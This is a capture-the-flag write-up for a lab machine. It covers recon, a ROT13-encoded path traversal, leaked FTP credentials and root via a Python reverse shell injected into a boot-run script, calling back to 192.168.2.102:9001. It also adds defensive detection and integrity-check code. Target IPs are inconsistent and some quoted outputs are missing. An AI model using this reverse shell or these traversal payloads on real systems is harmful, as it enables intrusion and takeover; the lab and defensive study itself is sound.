Recon
Target: 192.168.2.103
Simple network map scan:
nmap -sS -sV -T5 192.168.2.103
Notes:
Open ports: 21, 22, 80
Versions: pyftpdlib 2.0.1, OpenSSH 8.4p1, Apache httpd 2.4.62
As usual, since port 80 is open, we started with a simple look in the browser.
The Sync config button takes us to the URL:
http://192.168.2.113/?theme=pbasvt.gkg
The page gave us valuable information about the FTP server, such as the FTP service using default credentials and the server keeping an FTP log file (which could be our target file to find).
I also noticed the weird value of the parameter:
theme=pbasvt.gkg
Followed by the Manual Help button. Based on the hint:
Use the encrypted path input to explore hidden files!
we can tell that the application requires a specific encoding of file paths in order to access their content.
ITCHY QUESTION: could the weird value of the theme param be using the same encoding? Well, let's find out... The main page provided us with 3 different values for the theme param:
jrypbzr.gkg
pbasvt.gkg
ernqzr.gkg
A quick cipher identifier tool found a potential ROT13 encoding. After decoding these values:
jrypbzr.gkg → welcome.txt
pbasvt.gkg → config.txt
ernqzr.gkg → readme.txt
we can tell that the theme param expects the path/to/file in ROT13. POSSIBLE PATH TRAVERSAL? Let's find out...
In order to find out whether the app is vulnerable to path traversal, we can ROT13-encode /etc/passwd with rot13.com and pray for the best. BOOOMM: path traversal.
The content of /etc/passwd popped up on the screen, proving the path traversal vulnerability...
Key finding: two users, welcome and max.
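As an added example (not part of the original writeup), the Python below shows the ROT13 transform the theme parameter uses, a hardened resolver that keeps a decoded value inside the theme directory, and a detector that runs over constructed Apache access-log lines and flags theme values which decode to an absolute path or a ".." segment. The log lines, the base directory /var/www/themes and all function names are assumptions, not anything from the application on the box.

```python
import codecs
import re
from pathlib import PurePosixPath
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit


def decode_theme(value: str) -> str:
    """Undo the ROT13 applied to the theme parameter (pbasvt.gkg -> config.txt)."""
    return codecs.decode(value, "rot_13")


def encode_theme(value: str) -> str:
    """ROT13 is its own inverse, so encoding is the same operation as decoding."""
    return codecs.encode(value, "rot_13")


def escapes_theme_dir(decoded: str) -> bool:
    """True when a decoded path would leave the theme directory:
    an absolute path or any '..' segment."""
    path = PurePosixPath(decoded)
    return path.is_absolute() or ".." in path.parts


def safe_theme_path(base_dir: str, theme_value: str) -> Optional[str]:
    """Hardened resolver (hypothetical): decode, then accept only a plain
    file name and join it under base_dir. Returns None for anything else."""
    decoded = decode_theme(theme_value)
    if escapes_theme_dir(decoded) or "/" in decoded or decoded in ("", "."):
        return None
    return str(PurePosixPath(base_dir) / decoded)


# Apache combined log format; only the fields needed to pull out the request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3})'
)


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, int]]:
    """Return (client_ip, decoded_theme, status) for every request whose
    decoded theme value escapes the theme directory."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        for raw in query.get("theme", []):
            decoded = decode_theme(raw)
            if escapes_theme_dir(decoded):
                findings.append((m.group("ip"), decoded, int(m.group("status"))))
    return findings


# Constructed sample log lines: two legitimate theme requests followed by
# the ROT13-encoded /etc/passwd and ../../opt/ftp_server.py requests.
SAMPLE_LOG = [
    '192.168.2.102 - - [01/Jan/2025:10:00:01 +0000] "GET /?theme=pbasvt.gkg HTTP/1.1" 200 512',
    '192.168.2.102 - - [01/Jan/2025:10:00:05 +0000] "GET /?theme=jrypbzr.gkg HTTP/1.1" 200 300',
    '192.168.2.102 - - [01/Jan/2025:10:00:09 +0000] "GET /?theme=/rgp/cnffjq HTTP/1.1" 200 2048',
    '192.168.2.102 - - [01/Jan/2025:10:00:12 +0000] "GET /?theme=../../bcg/sgc_freire.cl HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, decoded, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} requested {decoded!r} outside the theme dir (HTTP {status})")
```

The detector deliberately decodes before checking, because a filter that only looks for a literal "../" in the raw parameter never sees the traversal: in ROT13 it arrives as "../../bcg/...", and an absolute path arrives as "/rgp/cnffjq". The resolver takes the stricter route of refusing any separator at all, since the three legitimate values are bare file names.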
Now our target is the FTP log file. However, since we don't know the actual path to the .log file, we'll rely on fuzzing in order to find it. The fuzzing reveals a /logs directory with a 403 response code. Now that we know the directory name, we should fuzz for the file name with a specific extension: log.
For feroxbuster we can specify the argument --extensions log:
feroxbuster -u http://192.168.2.113/logs -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --filter-status 404 --scan-dir-listings --extensions log
The fuzzing was successful, throwing /logs/ftp_server.log back to us with status code 200:
curl http://192.168.2.113/logs/ftp_server.log --output -
The log file reveals two different files on the server:
/opt/ftp_server.py → FTP server configuration file
/opt/rev.sh → a bash script file
Since both files are under /opt/, we can use the previously found path traversal vulnerability with ROT13 encoding to access their content. As predicted, the ftp_server.py file contained the FTP server configuration with plain-text credentials:
JACKPOT:
FTP USER: ADMIN
FTP PASSWORD: 12345
We can now access the FTP server with:
ftp 192.168.2.103
Reverse Shell
Entry point: ftp://192.168.1.138/ftp_server.py
Payload and listener
The FTP server contained both the ftp_server.py and rev.sh files, which are owned by root...
The rev.sh contained:
Based on the content of the bash file, it seems a good entry point for a reverse shell. However, we cannot execute it; we can only read its content through the path traversal.
On the other hand, we have the ftp_server.py file... The machine starts the FTP server on boot. With that being said:
we can fetch the ftp_server.py file locally, inject our reverse shell, put it back on the target, and finally restart the machine to get root access...
We can achieve that with the following:
ftp> get ftp_server.py # GET THE FILE ON OUR OWN LOCAL MACHINE
nano ftp_server.py
Our injected reverse shell:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.2.102",9001));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty; pty.spawn("/bin/bash")
And that comes after importing the required libraries (os is needed for the dup2 calls):
import socket, os
This will be our final result:
Then we can simply put our crafted ftp_server.py file on the machine with:
ftp> put ftp_server.py # PUT THE FILE ON THE TARGET MACHINE
Finally, we can set up our listener:
nc -lnvp 9001
And then restart the target.
On boot we will achieve the reverse shell:
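As an added defender-side example, not code from the writeup: what hands over root here is that files executed at boot (ftp_server.py and rev.sh under /opt) can be overwritten through the FTP account. The Python below records a hash baseline of those files and audits them for a changed hash or for group/other write bits; demo() builds a constructed copy of the two files in a temporary directory, tampers with them, and returns both audit results. The file names, the mode check and the baseline format are assumptions, not the box's own tooling.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Constructed: the two files the FTP log pointed at, relative to the FTP root.
BOOT_EXECUTED = ("ftp_server.py", "rev.sh")


def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 so large files do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def record_baseline(root: str, names=BOOT_EXECUTED) -> Dict[str, str]:
    """Snapshot the hashes of the boot-executed files while they are known good."""
    return {
        name: sha256_of(Path(root) / name)
        for name in names
        if (Path(root) / name).is_file()
    }


def audit_ftp_root(root: str, baseline: Dict[str, str], names=BOOT_EXECUTED) -> List[Tuple[str, str]]:
    """Return (file, finding) pairs for files that are missing, writable by
    group/other, or whose content no longer matches the baseline."""
    findings = []
    for name in names:
        path = Path(root) / name
        if not path.is_file():
            findings.append((name, "missing"))
            continue
        mode = path.stat().st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((name, "writable by group/other: %o" % stat.S_IMODE(mode)))
        if name in baseline and baseline[name] != sha256_of(path):
            findings.append((name, "hash changed since baseline"))
    return findings


def demo() -> Tuple[List[Tuple[str, str]], List[Tuple[str, str]]]:
    """Build a constructed FTP root, audit it clean, then tamper and audit again."""
    root = tempfile.mkdtemp(prefix="ftp_root_")
    for name in BOOT_EXECUTED:
        target = Path(root) / name
        target.write_text("# constructed original content\n")
        os.chmod(target, 0o644)
    baseline = record_baseline(root)
    clean = audit_ftp_root(root, baseline)
    # Tamper the way a write through the FTP account would: append to one
    # file and loosen the permissions on the other.
    with open(Path(root) / "ftp_server.py", "a") as fh:
        fh.write("# constructed appended line\n")
    os.chmod(Path(root) / "rev.sh", 0o666)
    tampered = audit_ftp_root(root, baseline)
    return clean, tampered


if __name__ == "__main__":
    before, after = demo()
    print("clean audit:", before)
    print("after tampering:", after)
```

Run from cron or a systemd timer against the real FTP root, this turns a silent overwrite of a root-executed script into an alert before the next reboot executes it; pairing it with an FTP account that has no write permission on /opt removes the path entirely.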
Root access
We successfully achieved root access on the server.
root@13max:/opt# cat /root/root.flag
flag{root-aaa245a6e5a82937c985c50c86282892}
root@13max:/opt# cat /home/welcome/user.flag
flag{user-a89162ba751904d59ebd8fed2fce8880}
User flag: flag{user-a89162ba751904d59ebd8fed2fce8880}
Root flag: flag{root-aaa245a6e5a82937c985c50c86282892}